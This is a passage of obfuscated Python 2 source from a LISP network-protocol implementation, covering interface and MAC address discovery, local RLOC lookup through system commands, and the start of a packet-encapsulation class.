if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
i1I1iI = ( i1I1iI >> 16 ) + ( i1I1iI & 0xffff )
i1I1iI += i1I1iI >> 16
i1I1iI = socket . htons ( ~ i1I1iI & 0xffff )
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
if 38 - 38: i1IIi . I1ii11iIi11i % Ii1I + iIii1I11I1II1 + O0
i1I1iI = struct . pack ( "H" , i1I1iI )
igmp = igmp [ 0 : 2 ] + i1I1iI + igmp [ 4 : : ]
return ( igmp )
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
def lisp_get_interface_address ( device ) :
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if ( device not in netifaces . interfaces ( ) ) : return ( None )
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
I1i1II1 = netifaces . ifaddresses ( device )
if ( I1i1II1 . has_key ( netifaces . AF_INET ) == False ) : return ( None )
if 89 - 89: OoO0O00 / OoO0O00
if 1 - 1: I1ii11iIi11i . i11iIiiIii
if 74 - 74: O0 + OoooooooOO / oO0o / OoOoOO00 . I1ii11iIi11i % oO0o
if 34 - 34: i1IIi . I1IiiI
i11I1IIiiii = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 85 - 85: iIii1I11I1II1
for O0o00o000oO in I1i1II1 [ netifaces . AF_INET ] :
oOo0O = O0o00o000oO [ "addr" ]
i11I1IIiiii . store_address ( oOo0O )
return ( i11I1IIiiii )
if 30 - 30: Ii1I . I1ii11iIi11i / OOooOOo
return ( None )
if 2 - 2: IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
def lisp_get_input_interface ( packet ) :
OOOO = lisp_format_packet ( packet [ 0 : 12 ] ) . replace ( " " , "" )
oO = OOOO [ 0 : 12 ]
Iii11111iiI = OOOO [ 12 : : ]
if 67 - 67: o0oOOo0O0Ooo
try : OOOoO00O = lisp_mymacs . has_key ( Iii11111iiI )
except : OOOoO00O = False
if 27 - 27: I1ii11iIi11i * i1IIi . i1IIi
if ( lisp_mymacs . has_key ( oO ) ) : return ( lisp_mymacs [ oO ] , Iii11111iiI , oO , OOOoO00O )
if ( OOOoO00O ) : return ( lisp_mymacs [ Iii11111iiI ] , Iii11111iiI , oO , OOOoO00O )
return ( [ "?" ] , Iii11111iiI , oO , OOOoO00O )
if 87 - 87: IiII / I1Ii111 - Oo0Ooo
if 56 - 56: O0
if 45 - 45: OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
def lisp_get_local_interfaces ( ) :
for OO0oo00oOO in netifaces . interfaces ( ) :
I1i = lisp_interface ( OO0oo00oOO )
I1i . add_interface ( )
if 82 - 82: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo % i11iIiiIii / I1Ii111 % OoooooooOO
return
if 96 - 96: oO0o - oO0o
if 87 - 87: Oo0Ooo / OoooooooOO - I1ii11iIi11i . IiII + iIii1I11I1II1 . I1ii11iIi11i
if 4 - 4: OoooooooOO + ooOoO0o . i1IIi / O0 - O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
def lisp_get_loopback_address ( ) :
for O0o00o000oO in netifaces . ifaddresses ( "lo" ) [ netifaces . AF_INET ] :
if ( O0o00o000oO [ "peer" ] == "127.0.0.1" ) : continue
return ( O0o00o000oO [ "peer" ] )
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
return ( None )
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
if 70 - 70: I11i + Oo0Ooo * iIii1I11I1II1 . I1IiiI * I11i
if 49 - 49: o0oOOo0O0Ooo
if 25 - 25: iII111i . OoooooooOO * iIii1I11I1II1 . o0oOOo0O0Ooo / O0 + Ii1I
if 68 - 68: Oo0Ooo
def lisp_is_mac_string ( mac_str ) :
Oo0OOo = mac_str . split ( "/" )
if ( len ( Oo0OOo ) == 2 ) : mac_str = Oo0OOo [ 0 ]
return ( len ( mac_str ) == 14 and mac_str . count ( "-" ) == 2 )
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if 46 - 46: iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
def lisp_get_local_macs ( ) :
for OO0oo00oOO in netifaces . interfaces ( ) :
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
Ii = OO0oo00oOO . replace ( ":" , "" )
Ii = OO0oo00oOO . replace ( "-" , "" )
if ( Ii . isalnum ( ) == False ) : continue
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
try :
oo0OoOO0000 = netifaces . ifaddresses ( OO0oo00oOO )
except :
continue
if 2 - 2: Ii1I * I1ii11iIi11i * OoooooooOO
if ( oo0OoOO0000 . has_key ( netifaces . AF_LINK ) == False ) : continue
Oo0OOo = oo0OoOO0000 [ netifaces . AF_LINK ] [ 0 ] [ "addr" ]
Oo0OOo = Oo0OOo . replace ( ":" , "" )
if 73 - 73: OoOoOO00 + Oo0Ooo
if 61 - 61: iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if ( len ( Oo0OOo ) < 12 ) : continue
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if ( lisp_mymacs . has_key ( Oo0OOo ) == False ) : lisp_mymacs [ Oo0OOo ] = [ ]
lisp_mymacs [ Oo0OOo ] . append ( OO0oo00oOO )
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
lprint ( "Local MACs are: {}" . format ( lisp_mymacs ) )
return
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
def lisp_get_local_rloc ( ) :
o0oOoO00 = commands . getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
if ( o0oOoO00 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 94 - 94: OoO0O00 + IiII + ooOoO0o
if 82 - 82: Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + IiII % iIii1I11I1II1
if 61 - 61: OOooOOo / Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
if 82 - 82: Oo0Ooo
o0oOoO00 = o0oOoO00 . split ( "\n" ) [ 0 ]
OO0oo00oOO = o0oOoO00 . split ( ) [ - 1 ]
if 5 - 5: OoO0O00 / OoO0O00 - O0 - I1Ii111 + I1Ii111
O0o00o000oO = ""
O0oooOO0Oo0o = lisp_is_macos ( )
if ( O0oooOO0Oo0o ) :
o0oOoO00 = commands . getoutput ( "ifconfig {} | egrep 'inet '" . format ( OO0oo00oOO ) )
if ( o0oOoO00 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
else :
OoOoOoo0OoO0 = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OO0oo00oOO )
o0oOoO00 = commands . getoutput ( OoOoOoo0OoO0 )
if ( o0oOoO00 == "" ) :
OoOoOoo0OoO0 = 'ip addr show | egrep "inet " | egrep "global lo"'
o0oOoO00 = commands . getoutput ( OoOoOoo0OoO0 )
if 17 - 17: Ii1I * II111iiii / IiII + iIii1I11I1II1 . I11i - O0
if ( o0oOoO00 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 70 - 70: Ii1I * oO0o - I11i + Oo0Ooo % I1ii11iIi11i - IiII
if 81 - 81: O0 . O0
if 75 - 75: iIii1I11I1II1 % IiII + I1ii11iIi11i * O0 . iII111i - ooOoO0o
if 32 - 32: Ii1I % oO0o - i1IIi
if 40 - 40: iIii1I11I1II1 + iII111i * OoOoOO00 + oO0o
if 15 - 15: I11i % I1IiiI - iIii1I11I1II1 * ooOoO0o
O0o00o000oO = ""
o0oOoO00 = o0oOoO00 . split ( "\n" )
if 71 - 71: OoOoOO00 % Oo0Ooo % ooOoO0o
for I111 in o0oOoO00 :
O0o00O0Oo0 = I111 . split ( ) [ 1 ]
if ( O0oooOO0Oo0o == False ) : O0o00O0Oo0 = O0o00O0Oo0 . split ( "/" ) [ 0 ]
III1 = lisp_address ( LISP_AFI_IPV4 , O0o00O0Oo0 , 32 , 0 )
return ( III1 )
if 66 - 66: o0oOOo0O0Ooo * OOooOOo + Ii1I * o0oOOo0O0Ooo + OOooOOo / OoooooooOO
return ( lisp_address ( LISP_AFI_IPV4 , O0o00o000oO , 32 , 0 ) )
if 86 - 86: Ii1I . iII111i - iII111i
if 71 - 71: iIii1I11I1II1 . II111iiii % iIii1I11I1II1
if 22 - 22: i11iIiiIii % I1ii11iIi11i % ooOoO0o % ooOoO0o . OoO0O00
if 85 - 85: ooOoO0o . O0 / OOooOOo * ooOoO0o - OoO0O00 - i11iIiiIii
if 25 - 25: ooOoO0o % Oo0Ooo - OOooOOo
if 80 - 80: IiII % II111iiii - Oo0Ooo - iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 28 - 28: OoooooooOO % oO0o + I1ii11iIi11i + O0 . I1Ii111
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
def lisp_get_local_addresses ( ) :
global lisp_myrlocs
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
if 8 - 8: I1Ii111 + OoO0O00
if 9 - 9: OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: oO0o
i1iiI = None
OO000o00 = 1
o0o = os . getenv ( "LISP_ADDR_SELECT" )
if ( o0o != None and o0o != "" ) :
o0o = o0o . split ( ":" )
if ( len ( o0o ) == 2 ) :
i1iiI = o0o [ 0 ]
OO000o00 = o0o [ 1 ]
else :
if ( o0o [ 0 ] . isdigit ( ) ) :
OO000o00 = o0o [ 0 ]
else :
i1iiI = o0o [ 0 ]
if 73 - 73: OoOoOO00 % o0oOOo0O0Ooo
if 71 - 71: oO0o - OoooooooOO * Oo0Ooo * I11i + o0oOOo0O0Ooo * I1ii11iIi11i
OO000o00 = 1 if ( OO000o00 == "" ) else int ( OO000o00 )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
if 38 - 38: I11i . I11i * oO0o / OoooooooOO % ooOoO0o
OO000 = [ None , None , None ]
IIiii11ii1II1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
o0OO000O = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
O000o0000O = None
if 61 - 61: OOooOOo * o0oOOo0O0Ooo * O0 / iII111i
for OO0oo00oOO in netifaces . interfaces ( ) :
if ( i1iiI != None and i1iiI != OO0oo00oOO ) : continue
I1i1II1 = netifaces . ifaddresses ( OO0oo00oOO )
if ( I1i1II1 == { } ) : continue
if 52 - 52: Oo0Ooo + iIii1I11I1II1 + i1IIi * Ii1I - II111iiii . II111iiii
if 22 - 22: i1IIi - I1Ii111 / iII111i - OoOoOO00 . oO0o
if 49 - 49: I1IiiI - i11iIiiIii + IiII
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
O000o0000O = lisp_get_interface_instance_id ( OO0oo00oOO , None )
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
if 84 - 84: Oo0Ooo
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
if ( I1i1II1 . has_key ( netifaces . AF_INET ) ) :
IiiIIi1 = I1i1II1 [ netifaces . AF_INET ]
OoO = 0
for O0o00o000oO in IiiIIi1 :
IIiii11ii1II1 . store_address ( O0o00o000oO [ "addr" ] )
if ( IIiii11ii1II1 . is_ipv4_loopback ( ) ) : continue
if ( IIiii11ii1II1 . is_ipv4_link_local ( ) ) : continue
if ( IIiii11ii1II1 . address == 0 ) : continue
OoO += 1
IIiii11ii1II1 . instance_id = O000o0000O
if ( i1iiI == None and
lisp_db_for_lookups . lookup_cache ( IIiii11ii1II1 , False ) ) : continue
OO000 [ 0 ] = IIiii11ii1II1
if ( OoO == OO000o00 ) : break
if 67 - 67: I1ii11iIi11i + Ii1I
if 72 - 72: IiII % o0oOOo0O0Ooo
if ( I1i1II1 . has_key ( netifaces . AF_INET6 ) ) :
iI1iIiiI = I1i1II1 [ netifaces . AF_INET6 ]
OoO = 0
for O0o00o000oO in iI1iIiiI :
oOo0O = O0o00o000oO [ "addr" ]
o0OO000O . store_address ( oOo0O )
if ( o0OO000O . is_ipv6_string_link_local ( oOo0O ) ) : continue
if ( o0OO000O . is_ipv6_loopback ( ) ) : continue
OoO += 1
o0OO000O . instance_id = O000o0000O
if ( i1iiI == None and
lisp_db_for_lookups . lookup_cache ( o0OO000O , False ) ) : continue
OO000 [ 1 ] = o0OO000O
if ( OoO == OO000o00 ) : break
if 93 - 93: iIii1I11I1II1 + i11iIiiIii . o0oOOo0O0Ooo . i1IIi % I1IiiI % ooOoO0o
if 74 - 74: OoOoOO00 / i1IIi % OoooooooOO
if 52 - 52: IiII % ooOoO0o
if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if ( OO000 [ 0 ] == None ) : continue
if 65 - 65: II111iiii / Oo0Ooo
OO000 [ 2 ] = OO0oo00oOO
break
if 42 - 42: i11iIiiIii . O0
if 75 - 75: I1Ii111 + iIii1I11I1II1
IiiiI1 = OO000 [ 0 ] . print_address_no_iid ( ) if OO000 [ 0 ] else "none"
I1IIIi = OO000 [ 1 ] . print_address_no_iid ( ) if OO000 [ 1 ] else "none"
OO0oo00oOO = OO000 [ 2 ] if OO000 [ 2 ] else "none"
if 39 - 39: I11i . I1ii11iIi11i . OOooOOo * I11i / O0 * o0oOOo0O0Ooo
i1iiI = " (user selected)" if i1iiI != None else ""
if 35 - 35: i1IIi * i11iIiiIii % I1ii11iIi11i / IiII / IiII
IiiiI1 = red ( IiiiI1 , False )
I1IIIi = red ( I1IIIi , False )
OO0oo00oOO = bold ( OO0oo00oOO , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( IiiiI1 , I1IIIi , OO0oo00oOO , i1iiI , O000o0000O ) )
if 91 - 91: OoO0O00 * I1Ii111 % OoO0O00 . o0oOOo0O0Ooo * I1ii11iIi11i . OOooOOo
if 13 - 13: I1ii11iIi11i
lisp_myrlocs = OO000
return ( ( OO000 [ 0 ] != None ) )
if 80 - 80: Oo0Ooo % IiII % OoooooooOO * Oo0Ooo % Ii1I
if 41 - 41: OoooooooOO / i1IIi
if 70 - 70: OoOoOO00 % o0oOOo0O0Ooo % i1IIi / I1ii11iIi11i % i11iIiiIii / i1IIi
if 4 - 4: IiII
if 93 - 93: oO0o % i1IIi
if 83 - 83: I1IiiI . Oo0Ooo - I11i . o0oOOo0O0Ooo
if 73 - 73: I1IiiI - iII111i . iII111i
if 22 - 22: ooOoO0o / ooOoO0o - Ii1I % I11i . OOooOOo + IiII
if 64 - 64: i1IIi % I1ii11iIi11i / Ii1I % OoooooooOO
def lisp_get_all_addresses ( ) :
I1iii1 = [ ]
for I1i in netifaces . interfaces ( ) :
try : iIiiiIIiii = netifaces . ifaddresses ( I1i )
except : continue
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if ( iIiiiIIiii . has_key ( netifaces . AF_INET ) ) :
for O0o00o000oO in iIiiiIIiii [ netifaces . AF_INET ] :
O0o00O0Oo0 = O0o00o000oO [ "addr" ]
if ( O0o00O0Oo0 . find ( "127.0.0.1" ) != - 1 ) : continue
I1iii1 . append ( O0o00O0Oo0 )
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
if ( iIiiiIIiii . has_key ( netifaces . AF_INET6 ) ) :
for O0o00o000oO in iIiiiIIiii [ netifaces . AF_INET6 ] :
O0o00O0Oo0 = O0o00o000oO [ "addr" ]
if ( O0o00O0Oo0 == "::1" ) : continue
if ( O0o00O0Oo0 [ 0 : 5 ] == "fe80:" ) : continue
I1iii1 . append ( O0o00O0Oo0 )
if 96 - 96: I11i
if 34 - 34: OoOoOO00 / OoO0O00 - I1IiiI . O0 . OOooOOo
if 63 - 63: iII111i
return ( I1iii1 )
if 11 - 11: iII111i - iIii1I11I1II1
if 92 - 92: OoO0O00
if 15 - 15: IiII / IiII + iIii1I11I1II1 % OoooooooOO
if 12 - 12: ooOoO0o
if 36 - 36: I1Ii111 . IiII * OoooooooOO - o0oOOo0O0Ooo
if 60 - 60: OOooOOo . iII111i / iIii1I11I1II1 + OOooOOo * I1Ii111
if 82 - 82: i11iIiiIii . iIii1I11I1II1 * I1IiiI - I11i + Ii1I
if 48 - 48: I1ii11iIi11i
def lisp_get_all_multicast_rles ( ) :
o0oi1I1I1I = [ ]
o0oOoO00 = commands . getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( o0oOoO00 == "" ) : return ( o0oi1I1I1I )
if 25 - 25: o0oOOo0O0Ooo + iII111i - Oo0Ooo
o000oo0o = o0oOoO00 . split ( "\n" )
for I111 in o000oo0o :
if ( I111 [ 0 ] == "#" ) : continue
OoO000oo000o0 = I111 . split ( "rle-address = " ) [ 1 ]
i1Ii1I1Ii11iI = int ( OoO000oo000o0 . split ( "." ) [ 0 ] )
if ( i1Ii1I1Ii11iI >= 224 and i1Ii1I1Ii11iI < 240 ) : o0oi1I1I1I . append ( OoO000oo000o0 )
if 8 - 8: I1ii11iIi11i
return ( o0oi1I1I1I )
if 82 - 82: OoooooooOO
if 75 - 75: II111iiii % I1IiiI + OOooOOo % OoooooooOO / IiII
if 4 - 4: i11iIiiIii - OOooOOo % I1ii11iIi11i * I1Ii111 % o0oOOo0O0Ooo
if 71 - 71: ooOoO0o . ooOoO0o - iIii1I11I1II1
if 22 - 22: OoooooooOO / I1ii11iIi11i % iII111i * OoOoOO00
if 32 - 32: OoooooooOO % oO0o % iIii1I11I1II1 / O0
if 61 - 61: II111iiii . O0 - Ii1I - I1ii11iIi11i / i11iIiiIii - II111iiii
if 98 - 98: Ii1I - I1IiiI . i11iIiiIii * Oo0Ooo
class lisp_packet ( ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
if 29 - 29: Ii1I / ooOoO0o % I11i
if 10 - 10: iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
def encode ( self , nonce ) :
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if ( self . outer_source . is_null ( ) ) : return ( None )
if 79 - 79: O0
if 32 - 32: II111iiii . O0 + Ii1I / OoOoOO00 / IiII / OOooOOo
if 15 - 15: I1ii11iIi11i
if 4 - 4: IiII + iIii1I11I1II1 * iII111i + Oo0Ooo * o0oOOo0O0Ooo % II111iiii
if 88 - 88: oO0o - i1IIi % i11iIiiIii % II111iiii * OoooooooOO
if 40 - 40: Oo0Ooo
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
if 47 - 47: OoOoOO00
self . lisp_header . instance_id ( self . inner_dest . instance_id )
if 65 - 65: O0 + I1Ii111 % Ii1I * I1IiiI / ooOoO0o / OoOoOO00
if 71 - 71: i11iIiiIii / OoOoOO00 . oO0o
if 33 - 33: oO0o
if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
self . lisp_header . key_id ( 0 )
III = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and III == False ) :
oOo0O = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if 48 - 48: OOooOOo . OOooOOo + i11iIiiIii + I1ii11iIi11i % O0
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oOo0O ) ) :
O0000 = lisp_crypto_keys_by_rloc_encap [ oOo0O ]
if ( O0000 [ 1 ] ) :
O0000 [ 1 ] . use_count += 1
ii1i1II , iiI1ii1IIiI = self . encrypt ( O0000 [ 1 ] , oOo0O )
if ( iiI1ii1IIiI ) : self . packet = ii1i1II
if 35 - 35: I1ii11iIi11i * iII111i . IiII . IiII - oO0o % OoOoOO00
if 42 - 42: o0oOOo0O0Ooo - iIii1I11I1II1 % OoooooooOO
if 43 - 43: o0oOOo0O0Ooo - Oo0Ooo
if 85 - 85: II111iiii + I1Ii111 - ooOoO0o * iIii1I11I1II1 % oO0o
if 62 - 62: Ii1I + O0 * OoO0O00
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
else :
self . udp_sport = lisp_crypto_ephem_port
if 23 - 23: II111iiii * iII111i
else :
self . udp_sport = LISP_DATA_PORT
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if ( self . outer_version == 4 ) :
O0o0oOOO = socket . htons ( self . udp_sport )
IIi11 = socket . htons ( self . udp_dport )
else :
O0o0oOOO = self . udp_sport
IIi11 = self . udp_dport
if 78 - 78: I1Ii111 / oO0o - iIii1I11I1II1 - OoOoOO00
if 60 - 60: II111iiii
IIi11 = socket . htons ( self . udp_dport ) if self . outer_version == 4 else self . udp_dport
if 90 - 90: OoOoOO00
if 37 - 37: OoOoOO00 + O0 . O0 * Oo0Ooo % I1Ii111 / iII111i
O0OO0ooO00 = struct . pack ( "HHHH" , O0o0oOOO , IIi11 , socket . htons ( self . udp_length ) ,
self . udp_checksum )
if 18 - 18: OoooooooOO
if 57 - 57: ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo - OoooooooOO
if 75 - 75: i11iIiiIii / o0oOOo0O0Ooo . IiII . i1IIi . i1IIi / I11i
if 94 - 94: ooOoO0o + I1IiiI
oOOOoo00oO = self . lisp_header . encode ( )
if 59 - 59: Ii1I / OoOoOO00 * OoO0O00 * iII111i % oO0o
if 61 - 61: Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
if ( self . outer_version == 4 ) :
IIIIIiiI11i1 = socket . htons ( self . udp_length + 20 )
Iii1I = socket . htons ( 0x4000 )
ooo = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , IIIIIiiI11i1 , 0xdfdf ,
Iii1I , self . outer_ttl , 17 , 0 )
ooo += self . outer_source . pack_address ( )
ooo += self . outer_dest . pack_address ( )
ooo = lisp_ip_checksum ( ooo )
elif ( self . outer_version == 6 ) :
ooo = ""
if 39 - 39: oO0o / ooOoO0o * II111iiii * iII111i
if 41 - 41: i11iIiiIii * O0 - iII111i . II111iiii % OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
else :
return ( None )
